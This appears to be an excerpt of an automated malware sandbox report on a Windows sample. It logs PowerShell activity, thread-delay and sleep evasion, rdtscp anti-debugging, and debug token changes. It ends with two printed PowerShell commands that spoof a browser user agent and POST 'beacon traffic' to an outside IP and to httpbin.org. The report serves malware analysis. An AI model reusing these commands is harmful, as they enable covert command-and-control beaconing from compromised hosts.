Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Code function: 0_2_00AC2340 rdtscp

0_2_00AC2340

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3889	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5974	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1909	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2079	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2938
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6769
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2705
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1800
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3215
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2043

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep count: 3889 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep count: 5974 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep count: 1909 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep count: 2079 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544	Thread sleep count: 2938 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544	Thread sleep count: 6769 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3336	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep count: 2705 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924	Thread sleep count: 1800 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2520	Thread sleep count: 3215 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep count: 6558 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4596	Thread sleep count: 1895 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4596	Thread sleep count: 2043 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 732	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000006.00000002.2023968027.000001F43A270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: powershell.exe, 00000007.00000002.2380075739.000001DC9D290000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: powershell.exe, 0000000B.00000002.2883124451.0000020860B24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: powershell.exe, 00000002.00000002.1987556693.000001F1EA19A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&Wjj9
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2992991746.0000016681D4C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440115787.000002009D7FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Code function: 0_2_00AC2340 Start: 00AC2349 End: 00AC235F

0_2_00AC2340

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Code function: 0_2_00AC2340 rdtscp

0_2_00AC2340

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
